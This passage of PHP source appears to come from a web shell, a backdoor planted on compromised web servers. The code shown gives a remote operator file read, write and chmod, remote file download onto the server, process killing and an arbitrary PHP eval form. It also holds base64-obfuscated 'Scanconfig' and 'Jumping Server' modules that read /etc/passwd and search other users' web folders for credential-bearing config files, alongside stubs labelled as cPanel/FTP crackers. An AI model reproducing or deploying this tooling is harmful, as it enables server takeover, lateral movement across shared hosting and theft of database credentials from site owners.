  1947.     echo "<option value=chmod".($dspact == "chmod"?" selected":"").">Change-mode</option>";
  1948.     if ($usefsbuff) {
  1949.       echo "<option value=cut".($dspact == "cut"?" selected":"").">Cut</option>";
  1950.       echo "<option value=copy".($dspact == "copy"?" selected":"").">Copy</option>";
  1951.       echo "<option value=unselect".($dspact == "unselect"?" selected":"").">Unselect</option>";
  1952.     }
  1953.     echo "</select>&nbsp;<input type=submit value=\"Confirm\"></div>";
  1954.     echo "</form>";
  1955.   }
  1956. }
  1957. if ($x == "tools")
  1958. {
  1959.  
  1960. }
  1961. if ($x == "phpfsys") {
  1962.   echo "<div align=left>";
  1963.   $fsfunc = $phpfsysfunc;
  1964.   if ($fsfunc=="copy") {
  1965.     if (!copy($arg1, $arg2)) { echo "Failed to copy $arg1...\n";}
  1966.     else { echo "<b>Success!</b> $arg1 copied to $arg2\n"; }
  1967.   }
  1968.   elseif ($fsfunc=="rename") {
  1969.     if (!rename($arg1, $arg2)) { echo "Failed to rename/move $arg1!\n";}
  1970.     else { echo "<b>Success!</b> $arg1 renamed/moved to $arg2\n"; }
  1971.   }
  1972.   elseif ($fsfunc=="chmod") {
  1973.     if (!chmod($arg1,$arg2)) { echo "Failed to chmod $arg1!\n";}
  1974.     else { echo "<b>Perm for $arg1 changed to $arg2!</b>\n"; }
  1975.   }
  1976.   elseif ($fsfunc=="read") {
  1977.     $hasil = @file_get_contents($arg1);
  1978.     echo "<b>Filename:</b> $arg1<br>";
  1979.     echo "<textarea cols=150 rows=20>";
  1980.     echo $hasil;
  1981.     echo "</textarea>\n";
  1982.   }
  1983.   elseif ($fsfunc=="write") {
  1984.     if(@file_put_contents($d.$arg1,$arg2)) {
  1985.       echo "<b>Saved!</b> ".$d.$arg1;
  1986.     }
  1987.     else { echo "<div class=fxerrmsg>Couldn't write to $arg1!</div>"; }
  1988.   }
  1989.   elseif ($fsfunc=="downloadbin") {
  1990.     $handle = fopen($arg1, "rb");
  1991.     $contents = '';
  1992.     while (!feof($handle)) {
  1993.       $contents .= fread($handle, 8192);
  1994.     }
  1995.     $r = @fopen($d.$arg2,'w');
  1996.     if (fwrite($r,$contents)) { echo "<b>Success!</b> $arg1 saved to ".$d.$arg2." (".view_size(filesize($d.$arg2)).")"; }
  1997.     else { echo "<div class=fxerrmsg>Couldn't write to ".$d.$arg2."!</div>"; }
  1998.     fclose($r);
  1999.     fclose($handle);
  2000.   }
  2001.   elseif ($fsfunc=="download") {
  2002.     $text = implode('', file($arg1));
  2003.     if ($text) {
  2004.       $r = @fopen($d.$arg2,'w');
  2005.       if (fwrite($r,$text)) { echo "<b>Success!</b> $arg1 saved to ".$d.$arg2." (".view_size(filesize($d.$arg2)).")"; }
  2006.       else { echo "<div class=fxerrmsg>Couldn't write to ".$d.$arg2."!</div>"; }
  2007.       fclose($r);
  2008.     }
  2009.     else { echo "<div class=fxerrmsg>Couldn't download from $arg1!</div>";}
  2010.   }
  2011.   elseif ($fsfunc=='mkdir') {
  2012.     $thedir = $d.$arg1;
  2013.     if ($thedir != $d) {
  2014.       if (file_exists($thedir)) { echo "<b>Already exists:</b> ".htmlspecialchars($thedir); }
  2015.       elseif (!mkdir($thedir)) { echo "<b>Access denied:</b> ".htmlspecialchars($thedir); }
  2016.       else { echo "<b>Dir created:</b> ".htmlspecialchars($thedir);}
  2017.     }
  2018.     else { echo "Couldn't create current dir:<b> $thedir</b>"; }
  2019.   }
  2020.   elseif ($fsfunc=='fwritabledir') {
  2021.     function recurse_dir($dir,$max_dir) {
  2022.       global $dir_count;
  2023.       $dir_count++;
  2024.       if( $cdir = @dir($dir) ) {
  2025.         while( $entry = $cdir-> read() ) {
  2026.           if( $entry != '.' && $entry != '..' ) {
  2027.             if(is_dir($dir.$entry) && is_writable($dir.$entry) ) {
  2028.              if ($dir_count > $max_dir) { return; }
  2029.               echo "[".$dir_count."] ".$dir.$entry."\n";
  2030.               recurse_dir($dir.$entry.DIRECTORY_SEPARATOR,$max_dir);
  2031.             }
  2032.           }
  2033.         }
  2034.         $cdir->close();
  2035.       }
  2036.     }
  2037.     if (!$arg1) { $arg1 = $d; }
  2038.     if (!$arg2) { $arg2 = 10; }
  2039.     echo "<b>Writable directories (Max: $arg2) in:</b> $arg1<br>";
  2040.     echo "<pre>";
  2041.     recurse_dir($arg1,$arg2);
  2042.     echo "</pre>";
  2043.     $total = $dir_count - 1;
  2044.     echo "<b>Founds:</b> ".$total." of <b>Max</b> $arg2";
  2045.   }
  2046.   else {
  2047.     if (!$arg1) { echo "<div class=fxerrmsg>No operation! Please fill parameter [A]!</div>\n"; }
  2048.     else {
  2049.       if ($hasil = $fsfunc($arg1)) {
  2050.         echo "<b>Result of $fsfunc $arg1:</b><br>";
  2051.         if (!is_array($hasil)) { echo "$hasil\n"; }
  2052.         else {
  2053.           echo "<pre>";
  2054.           foreach ($hasil as $v) { echo $v."\n"; }
  2055.           echo "</pre>";
  2056.         }
  2057.       }
  2058.       else { echo "<div class=fxerrmsg>$fsfunc $arg1 failed!</div>\n"; }
  2059.     }
  2060.   }
  2061.   echo "</div>\n";
  2062. }
  2063. if ($x == "processes") {
  2064.   echo "<div class=barheader>.: Processes :.</div>";
  2065.   if (!$win) { $handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":""); }
  2066.   else { $handler = "tasklist"; }
  2067.   $ret = myshellexec($handler);
  2068.   if (!$ret) { echo "Can't execute \"".$handler."\"!"; }
  2069.   else {
  2070.     if (empty($processes_sort)) {$processes_sort = $sort_default;}
  2071.     $parsesort = parsesort($processes_sort);
  2072.     if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;}
  2073.     $k = $parsesort[0];
  2074.     if ($parsesort[1] != "a") {
  2075.       $y = "<a href=\"".$surl."x=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."x=img&img=sort_desc\" border=\"0\"></a>";
  2076.     }
  2077.     else {
  2078.       $y = "<a href=\"".$surl."x=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."x=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";
  2079.     }
  2080.     $ret = htmlspecialchars($ret);
  2081.     if (!$win) {
  2082.       if ($pid) {
  2083.         if (is_null($sig)) {$sig = 9;}
  2084.         echo "Sending signal ".$sig." to #".$pid."... ";
  2085.         if (posix_kill($pid,$sig)) {echo "OK.";}
  2086.         else {echo "ERROR.";}
  2087.       }
  2088.       while (ereg("  ",$ret)) {$ret = str_replace("  "," ",$ret);}
  2089.       $stack = explode("\n",$ret);
  2090.       $head = explode(" ",$stack[0]);
  2091.       unset($stack[0]);
  2092.       for($i=0;$i<count($head);$i++) {
  2093.         if ($i != $k) {$head[$i] = "<a href=\"".$surl."x=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".$head[$i]."</b></a>";}
  2094.       }
  2095.       $prcs = array();
  2096.       foreach ($stack as $line) {
  2097.         if (!empty($line)) {
  2098.           echo "<tr>";
  2099.           $line = explode(" ",$line);
  2100.           $line[10] = join(" ",array_slice($line,10));
  2101.           $line = array_slice($line,0,11);
  2102.           if ($line[0] == get_current_user()) {$line[0] = "<font color=#4C83AF>".$line[0]."</font>";}
  2103.           $line[] = "<a href=\"".$surl."x=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";
  2104.           $prcs[] = $line;
  2105.           echo "</tr>";
  2106.         }
  2107.       }
  2108.     }
  2109.     else {
  2110.       while (ereg("  ",$ret)) {$ret = str_replace("  "," ",$ret);}
  2111.       while (ereg("=",$ret)) {$ret = str_replace("=","",$ret);}
  2112.       $ret = convert_cyr_string($ret,"d","w");
  2113.       $stack = explode("\n",$ret);
  2114.       unset($stack[0],$stack[2]);
  2115.       $stack = array_values($stack);
  2116.       $stack[0]=str_replace("Image Name","ImageName",$stack[0]);
  2117.       $stack[0]=str_replace("Session Name","SessionName",$stack[0]);
  2118.       $stack[0]=str_replace("Mem Usage","MemoryUsage",$stack[0]);
  2119.       $head = explode(" ",$stack[0]);
  2120.       $stack = array_slice($stack,1);
  2121.       $head = array_values($head);
  2122.       if ($parsesort[1] != "a") { $y = "<a href=\"".$surl."x=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."x=img&img=sort_desc\" border=\"0\"></a>"; }
  2123.       else { $y = "<a href=\"".$surl."x=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."x=img&img=sort_asc\" border=\"0\"></a>"; }
  2124.       if ($k > count($head)) {$k = count($head)-1;}
  2125.       for($i=0;$i<count($head);$i++) {
  2126.         if ($i != $k) { $head[$i] = "<a href=\"".$surl."x=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".trim($head[$i])."</b></a>"; }
  2127.       }
  2128.       $prcs = array();
  2129.       unset($stack[0]);
  2130.       foreach ($stack as $line) {
  2131.         if (!empty($line)) {
  2132.           $line = explode(" ",$line);
  2133.           $line[4] = str_replace(".","",$line[4]);
  2134.           $line[4] = intval($line[4]) * 1024;
  2135.           unset($line[5]);
  2136.           $prcs[] = $line;
  2137.         }
  2138.       }
  2139.     }
  2140.     $head[$k] = "<b>".$head[$k]."</b>".$y;
  2141.     $v = $processes_sort[0];
  2142.     usort($prcs,"tabsort");
  2143.     if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);}
  2144.     $tab = array();
  2145.     $tab[] = $head;
  2146.     $tab = array_merge($tab,$prcs);
  2147.     echo "<table class=explorer>";
  2148.     foreach($tab as $i=>$k) {
  2149.       echo "<tr>";
  2150.       foreach($k as $j=>$v) {
  2151.         if ($win and $i > 0 and $j == 4) {$v = view_size($v);}
  2152.         echo "<td>".$v."</td>";
  2153.       }
  2154.       echo "</tr>";
  2155.     }
  2156.     echo "</table>";
  2157.   }
  2158. }
  2159.  
  2160. // Cpanel and FTP Cracker
  2161. if ($x == "crack") {
  2162. $crackers = '';eval(base64_decode($crackers));  
  2163.   }
  2164.  
  2165. // Scanconfig
  2166. if ($x == "scanconfig") {
  2167. $scanconfig = 'DQooJHNtID0gaW5pX2dldCgnc2FmZV9tb2RlJykgPT0gMCkgPyAkc20gPSAnb2ZmJzogZGllKCc8Zm9udCBzaXplPSI0IiBjb2xvcj0iIzAwMDAwMCIgZmFjZT0iQ2FsaWJyaSI+PGI+RXJyb3I6IFNhZmVfbW9kZSA9IE9uPC9iPjwvZm9udD4nKTsNCnNldF90aW1lX2xpbWl0KDApOw0KQCRwYXNzd2QgPSBmb3BlbignL2V0Yy9wYXNzd2QnLCdyJyk7DQppZiAoISRwYXNzd2QpIHsgZGllKCc8Zm9udCBzaXplPSI0IiBjb2xvcj0iIzAwMDAwMCIgZmFjZT0iQ2FsaWJyaSI+PGI+Wy1dIEVycm9yIDogQ291ZG5gdCBSZWFkIC9ldGMvcGFzc3dkPC9iPjwvZm9udD4nKTsgfQ0KJHB1YiA9IGFycmF5KCk7DQokdXNlcnMgPSBhcnJheSgpOw0KJGNvbmYgPSBhcnJheSgpOw0KJGkgPSAwOw0Kd2hpbGUoIWZlb2YoJHBhc3N3ZCkpDQp7DQokc3RyID0gZmdldHMoJHBhc3N3ZCk7DQppZiAoJGkgPiAxMDApDQp7DQogICRwb3MgPSBzdHJwb3MoJHN0ciwnOicpOw0KICAgJHVzZXJuYW1lID0gc3Vic3RyKCRzdHIsMCwkcG9zKTsNCiAgJGRpcnogPSAnL2hvbWUvJy4kdXNlcm5hbWUuJy9wdWJsaWNfaHRtbC8nOw0KICBpZiAoKCR1c2VybmFtZSAhPSAnJykpDQogIHsNCiAgIGlmIChpc19yZWFkYWJsZSgkZGlyeikpDQogICB7DQogICAgYXJyYXlfcHVzaCgkdXNlcnMsJHVzZXJuYW1lKTsNCiAgICBhcnJheV9wdXNoKCRwdWIsJGRpcnopOw0KICAgfQ0KICB9DQogICB9DQokaSsrOw0KfQ0KZWNobyAnPHA+DQo8Zm9udCBzaXplPSI1IiBjb2xvcj0iIzAwODA4MCIgZmFjZT0iQ2FsaWJyaSI+DQpTZXJ2ZXIgSnVtcGluZyBGaW5kZXIgVmVyc2lvbiAzLjAgPGJyPjwvZm9udD4NCjxmb250IHNpemU9IjMiIGNvbG9yPSIjODAwMDAwIiBmYWNlPSJDYWxpYnJpIj4NCkNyZWF0ZWQgYnkgdXphbmMgfCAyMDExIC0gVGFuZ2VyYW5nIC0gSW5kb25lc2lhDQo8L2ZvbnQ+DQo8L3A+PGJyPg0KPGZvbnQgc2l6ZT0iMyIgY29sb3I9IiMwMDgwODAiIGZhY2U9IkNhbGlicmkiPlsrXT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PVsgU1RBUlQgXT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PVsrXSA8YnI+PC9mb250Pg0KJzsNCmZvcmVhY2ggKCR1c2VycyBhcyAkdXNlcikNCnsNCmVjaG8gIjx0YWJsZSB3aXRoPSczMCUnPjx0cj48dGQ+PGZvbnQgc2l6ZT0nMycgY29sb3I9JyNlZTA4MDgnIGZhY2U9J0NhbGlicmknPiBbK10gL2hvbWUvJHVzZXIvcHVibGljX2h0bWwvPC9mb250Pjxici8+PC90ZD48L3RyPjwvdGFibGU+IjsNCn0NCmVjaG8gIlxuIDxmb250IHNpemU9JzMnIGNvbG9yPScjMDA4MDgwJyBmYWNlPSdDYWxpYnJpJz4gWytdPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09WyBGSU5JU0ggXT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PVsrXSA8YnI+PC9mb250PlxuIjsNCmVjaG8gIlxuIDxmb250IHNpemU9JzInIGNvbG9yPScjODAwMDAwJyBmYWNlPSdDYWxpYnJpJz5bK10gU2Nhbm5lcnMgaGF2ZSBiZWVuIGNvbXBsZXRlZCB8IFRoYW5rIHlvdSBmb3IgdXNpbmcgdGhpcyB0b29scyBbK108L2ZvbnQ+XG4iOw0K';eval(base64_decode($scanconfig));  
  2168. }
  2169.  
  2170. // Jumping Server
  2171. if ($x == "jumping") {
  2172. $jumping = 'DQooJHNtID0gaW5pX2dldCgnc2FmZV9tb2RlJykgPT0gMCkgPyAkc20gPSAnb2ZmJzogZGllKCc8Zm9udCBzaXplPSI0IiBjb2xvcj0iIzAwMDAwMCIgZmFjZT0iQ2FsaWJyaSI+PGI+RXJyb3I6IFNhZmVfbW9kZSA9IE9uPC9iPjwvZm9udD4nKTsNCnNldF90aW1lX2xpbWl0KDApOw0KQCRwYXNzd2QgPSBmb3BlbignL2V0Yy9wYXNzd2QnLCdyJyk7DQppZiAoISRwYXNzd2QpIHsgZGllKCc8Zm9udCBzaXplPSI0IiBjb2xvcj0iIzAwMDAwMCIgZmFjZT0iQ2FsaWJyaSI+PGI+Wy1dIEVycm9yIDogQ291ZG5gdCBSZWFkIC9ldGMvcGFzc3dkPC9iPjwvZm9udD4nKTsgfQ0KJHB1YiA9IGFycmF5KCk7DQokdXNlcnMgPSBhcnJheSgpOw0KJGNvbmYgPSBhcnJheSgpOw0KJGkgPSAwOw0Kd2hpbGUoIWZlb2YoJHBhc3N3ZCkpDQp7DQokc3RyID0gZmdldHMoJHBhc3N3ZCk7DQppZiAoJGkgPiAxMDApDQp7DQogICRwb3MgPSBzdHJwb3MoJHN0ciwnOicpOw0KICAkdXNlcm5hbWUgPSBzdWJzdHIoJHN0ciwwLCRwb3MpOw0KICAkZGlyeiA9ICcvaG9tZS8nLiR1c2VybmFtZS4nL3B1YmxpY19odG1sLyc7DQogIGlmICgoJHVzZXJuYW1lICE9ICcnKSkNCiAgew0KICAgaWYgKGlzX3JlYWRhYmxlKCRkaXJ6KSkNCiAgIHsNCiAgICBhcnJheV9wdXNoKCR1c2VycywkdXNlcm5hbWUpOw0KICAgIGFycmF5X3B1c2goJHB1YiwkZGlyeik7DQogICB9DQogIH0NCiAgIH0NCiRpKys7DQp9DQoNCmVjaG8gJzxwPg0KPGZvbnQgc2l6ZT0iNSIgY29sb3I9IiM0YzgzYWYiIGZhY2U9IkNhbGlicmkiPg0KU2NhbmNvbmZpZyA0LjA8YnI+PC9mb250Pg0KPGZvbnQgc2l6ZT0iMyIgY29sb3I9IiM4MDAwMDAiIGZhY2U9IkNhbGlicmkiPg0KQ3JlYXRlZCBieSB1emFuYyB8IDIwMTEgLSBUYW5nZXJhbmcgLSBJbmRvbmVzaWENCjwvZm9udD4NCjwvcD48YnI+DQo8Zm9udCBzaXplPSIzIiBjb2xvcj0iIzAwODA4MCIgZmFjZT0iQ2FsaWJyaSI+WytdPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09WyBTVEFSVCBdPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09WytdIDxicj48L2ZvbnQ+DQonOw0KZnVuY3Rpb24gcmVhZF9kaXIoJHBhdGgsJHVzZXJuYW1lKQ0Kew0KaWYgKCRoYW5kbGUgPSBvcGVuZGlyKCRwYXRoKSkNCnsNCndoaWxlIChmYWxzZSAhPT0gKCRmaWxlID0gcmVhZGRpcigkaGFuZGxlKSkpDQp7DQogICRmcGF0aCA9ICIkcGF0aCRmaWxlIjsNCiAgaWYgKCgkZmlsZSAhPSAnLicpIGFuZCAoJGZpbGUgIT0gJy4uJykpDQogIHsNCiAgIGlmIChpc19yZWFkYWJsZSgkZnBhdGgpKQ0KICAgew0KICAgICRkciA9ICRmcGF0aC4iLyI7DQogICAgaWYgKGlzX2RpcigkZHIpKQ0KICAgIHsNCgkNCiAgICAgcmVhZF9kaXIoJGRyLCR1c2VybmFtZSk7DQogICAgfQ0KICAgIGVsc2UNCiAgICB7DQogICAgICAgICAgICAgICAgICAgICAgICBpZiAoDQogICAgICAgICAgICAgICAgICAgICAgICAgKCRmaWxlPT0nY29uZmlnLnBocCcpDQogICAgICAgICAgICAgICAgICAgICAgICBvciAoJGZpbGU9PSdjb25maWcuaW5jLnBocCcpDQogICAgICAgICAgICAgICAgICAgICAgICBvciAoJGZpbGU9PSdjb25mLnBocCcpDQogICAgICAgICAgICAgICAgICAgICAgICBvciAoJGZpbGU9PSdzZXR0aW5ncy5waHAnKQ0KICAgICAgICAgICAgICAgICAgICAgICAgb3IgKCRmaWxlPT0nd3BfY29uZmlnLnBocCcpDQoJCQkJCQlvciAoJGZpbGU9PSdpbmMucGhwJykNCiAgICAgICAgICAgICAgICAgICAgICAgIG9yICgkZmlsZT09J2NvbmZpZy5waHAnKQ0KICAgICAgICAgICAgICAgICAgICAgICAgb3IgKCRmaWxlPT0nZ2xvYmFscy5waHAnKQ0KICAgICAgICAgICAgICAgICAgICAgICAgb3IgKCRmaWxlPT0nc2V0dGluZ3MucGhwJykNCiAgICAgICAgICAgICAgICAgICAgICAgIG9yICgkZmlsZT09J3NldHVwLnBocCcpDQogICAgICAgICAgICAgICAgICAgICAgICBvciAoJGZpbGU9PSdkYmNvbmYucGhwJykNCgkJCQkJCW9yICgkZmlsZT09J3NldHVwLnBocCcpDQoJCQkJCQlvciAoJGZpbGU9PSdjb21tb24ucGhwJykNCgkJCQkJCW9yICgkZmlsZT09J2NvbmZpZ19nbG9iYWwucGhwJykNCgkJCQkJCW9yICgkZmlsZT09J2RiX2Nvbm5lY3QucGhwJykNCgkJCQkJCW9yICgkZmlsZT09J3Zhci5waHAnKQ0KCQkJCQkJb3IgKCRmaWxlPT0nZ2xvYmFsLmluYy5waHAnKQ0KCQkJCQkJb3IgKCRmaWxlPT0nZ2xvYmFsLnBocCcpDQoJCQkJCQlvciAoJGZpbGU9PSdjb25maWcuaW5jJykNCgkJCQkJCW9yICgkZmlsZT09J215c3FsLnBocCcpDQoJCQkJCQlvciAoJGZpbGU9PSdjb25zdC5pbmMucGhwJykNCgkJCQkJCW9yICgkZmlsZT09J2RiYy5waHAnKQ0KICAgICAgICAgICAgICAgICAgICAgICAgb3IgKCRmaWxlPT0nZGJjb25maWcucGhwJykNCgkJCQkJCW9yICgkZmlsZT09J2RiX3NldHRpbmdzLnBocCcpDQoJCQkJCQlvciAoJGZpbGU9PSdkYnNldHRpbmdzLnBocCcpDQoJCQkJCQlvciAoJGZpbGU9PSdfY29uZmlnLnBocCcpDQogICAgICAgICAgICAgICAgICAgICAgICBvciAoJGZpbGU9PSdkYi5pbmMucGhwJykNCiAgICAgICAgICAgICAgICAgICAgICAgIG9yICgkZmlsZT09J2RiY29ubmVjdC5waHAnKQ0KICAgICAgICAgICAgICAgICAgICAgICAgb3IgKCRmaWxlPT0nQ0hBTkdFTE9HLnBocCcpDQogICAgICAgICAgICAgICAgICAgICAgICBvciAoJGZpbGU9PSdjb25uZWN0LnBocCcpDQogICAgICAgICAgICAgICAgICAgICAgICBvciAoJGZpbGU9PSdjb25maWd1cmUucGhwJykNCiAgICAgICAgICAgICAgICAgICAgICAgIG9yICgkZmlsZT09J2Nvbm5lY3QucGhwJykNCiAgICAgICAgICAgICAgICAgICAgICAgIG9yICgkZmlsZT09J2NvbmZpZ19nbG9iYWwucGhwJykNCiAgICAgICAgICAgICAgICAgICAgICAgIG9yICgkZmlsZT09J2NvbmZpZ3VyYXRpb24ucGhwJykNCiAgICAgICAgICAgICAgICAgICAgICAgIG9yICgkZmlsZT09J2RiLnBocCcpDQogICAgICAgICAgICAgICAgICAgICAgICBvciAoJGZpbGU9PSdjb25uZWN0LmluYy5waHAnKQ0KICAgICAgICAgICAgICAgICAgICAgICAgb3IgKCRmaWxlPT0nZGJjb25uZWN0LmluYy5waHAnKQ0KCQkJCQkJb3IgKCRmaWxlPT0na29uZWsucGhwJykNCgkJCQkJCW9yICgkZmlsZT09J2tvbmVrc2kucGhwJykNCgkJCQkJCW9yICgkZmlsZT09J3NldHRpbmcucGhwJykNCgkJCQkJCW9yICgkZmlsZT09J3dwLWNvbmZpZy5waHAnKQ0KCQkJCQkJb3IgKCRmaWxlPT0nZGIucGhwJykNCgkJCQkJCW9yICgkZmlsZT09J21hc3Rlci5waHAnKQ0KCQkJCQkJb3IgKCRmaWxlPT0naW5jbHVkZS5waHAnKQ0KCQkJCQkJb3IgKCRmaWxlPT0naW5jbHVkZXMucGhwJykNCgkJCQkJCW9yICgkZmlsZT09J2NvbmVjdC5waHAnKQ0KCQkJCQkJb3IgKCRmaWxlPT0nZGF0YWJhc2UucGhwJykNCgkJCQkJCW9yICgkZmlsZT09J0RCLnBocCcpDQoJCQkJCQlvciAoJGZpbGU9PSdzZXR0aW5ncy5waHAnKQ0KCQkJCQkJb3IgKCRmaWxlPT0nZnVuYy5waHAnKQ0KCQkJCQkJb3IgKCRmaWxlPT0na29uZmlnLnBocCcpDQoJCQkJCQlvciAoJGZpbGU9PSdrb25maWd1cmFzaS5waHAnKQ0KCQkJCQkJb3IgKCRmaWxlPT0nZnVuY3Rpb24ucGhwJykNCgkJCQkJCW9yICgkZmlsZT09J2Z1bmN0aW9ucy5waHAnKQ0KCQkJCQkJb3IgKCRmaWxlPT0nY29uZmlndXJlLnBocCcpDQoJCQkJCQlvciAoJGZpbGU9PSdjb25lY3Rpb24ucGhwJykpDQogICAgICAgICAgICAgICAgICAgICAgIHsNCgkgDQoJIGVjaG8gIjxmb250IHNpemU9JzInIGNvbG9yPScjZWUwODA4JyBmYWNlPSdDYWxpYnJpJz4gWytdICRmcGF0aFxuPC9mb250Pjxicj4iOw0KICAgICAgfQ0KICAgICB9DQogICAgfQ0KICAgfQ0KICB9DQp9DQp9DQpmb3JlYWNoICgkdXNlcnMgYXMgJHVzZXIpDQp7DQplY2hvICJcbiA8dGFibGUgd2l0aD0nMzAlJz48dHI+PHRkPjxmb250IHNpemU9JzInIGNvbG9yPScjMDA4MDgwJyBmYWNlPSdDYWxpYnJpJz48YnI+PGJyPiBbK10tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLSBbIGZpbGUgY29uZmlndXJhdGlvbiBdLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS1bK10gPGJyPjwvZm9udD5cbiI7DQokcGF0aCA9ICIvaG9tZS8kdXNlci9wdWJsaWNfaHRtbC8iOw0KcmVhZF9kaXIoJHBhdGgsJHVzZXIpOw0KZWNobyAnPC90ZD4nOw0KfQ0KZWNobyAiPHRyPjwvdGFibGU+XG4gPGZvbnQgc2l6ZT0nMycgY29sb3I9JyMwMDgwODAnIGZhY2U9J0NhbGlicmknPjxicj48YnI+IFsrXT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PVsgRklOSVNIIF09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT1bK10gPGJyPjwvZm9udD5cbiI7DQplY2hvICJcbiA8Zm9udCBzaXplPSczJyBjb2xvcj0nIzgwMDAwMCcgZmFjZT0nQ2FsaWJyaSc+ICAgICAgICAgWytdICAgICAgICAgICAgU2Nhbm5lcnMgaGF2ZSBiZWVuIGNvbXBsZXRlZCB8IFRoYW5rIHlvdSBiZWVuIHVzaW5nIHRoaXMgdG9vbHMgICAgICAgICAgWytdPC9mb250PlxuIjsNCg==';eval(base64_decode($jumping));  
  2173. }
  2174.  
  2175. // Cpanel and FTP Checker
  2176.  
  2177. if ($x == "checker") {
  2178. $checker = '';eval(base64_decode($checker));  
  2179. }
  2180.  
  2181. if ($x == "eval") {
  2182.   if (!empty($eval)) {
  2183.     echo "Result of execution this PHP-code:<br>";
  2184.     $tmp = ob_get_contents();
  2185.     $olddir = realpath(".");
  2186.     @chdir($d);
  2187.     if ($tmp) {
  2188.       ob_clean();
  2189.       eval($eval);
  2190.       $ret = ob_get_contents();
  2191.       $ret = convert_cyr_string($ret,"d","w");
  2192.       ob_clean();
  2193.       echo $tmp;
  2194.       if ($eval_txt) {
  2195.         $rows = count(explode("\r\n",$ret))+1;
  2196.         if ($rows < 10) {$rows = 10;}
  2197.         echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
  2198.       }
  2199.       else {echo $ret."<br>";}
  2200.     }
  2201.     else {
  2202.       if ($eval_txt) {
  2203.         echo "<br><textarea cols=\"122\" rows=\"15\" readonly>";
  2204.         eval($eval);
  2205.         echo "</textarea>";
  2206.       }
  2207.       else {echo $ret;}
  2208.     }
  2209.     @chdir($olddir);
  2210.   }
  2211.   else {echo "<b>Code Execution (Use without PHP Braces!)</b>"; if (empty($eval_txt)) {$eval_txt = TRUE;}}
  2212.   echo "<form action=\"".$surl."\" method=POST><input type=hidden name=x value=eval><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>";
  2213. }
  2214.  
  2215. if ($x == "f") {
  2216.   echo "<div align=left>";
  2217.   if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit") {
  2218.     if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";}
  2219.     else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."x=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";}
  2220.   }
  2221.   else {
  2222.     $r = @file_get_contents($d.$f);
  2223.     $ext = explode(".",$f);
  2224.     $c = count($ext)-1;
  2225.     $ext = $ext[$c];
  2226.     $ext = strtolower($ext);
  2227.     $rft = "";
  2228.     foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}}
  2229.     if (eregi("sess_(.*)",$f)) {$rft = "phpsess";}
  2230.     if (empty($ft)) {$ft = $rft;}
  2231.     $arr = array(
  2232.         array("info","info"),
  2233.         array("html","html"),
  2234.         array("txt","txt"),
  2235.         array("Code","code"),
  2236.         array("Session","phpsess"),
  2237.         array("exe","exe"),
  2238.         array("SDB","sdb"),
  2239.         array("img","img"),
  2240.         array("ini","ini"),
  2241.         array("download","download"),
  2242.         array("notepad","notepad"),
  2243.         array("edit","edit")
  2244.     );
  2245.     echo "<b>Viewing file:&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"".$surl."x=img&img=ext_".$ext."\" border=\"0\">&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".view_perms_color($d.$f)."</b><br>Select action/file-type:<br>";
  2246.     foreach($arr as $t) {
  2247.       if ($t[1] == $rft) {echo " <a href=\"".$surl."x=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=#4C83AF>".$t[0]."</font></a>";}
  2248.       elseif ($t[1] == $ft) {echo " <a href=\"".$surl."x=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";}
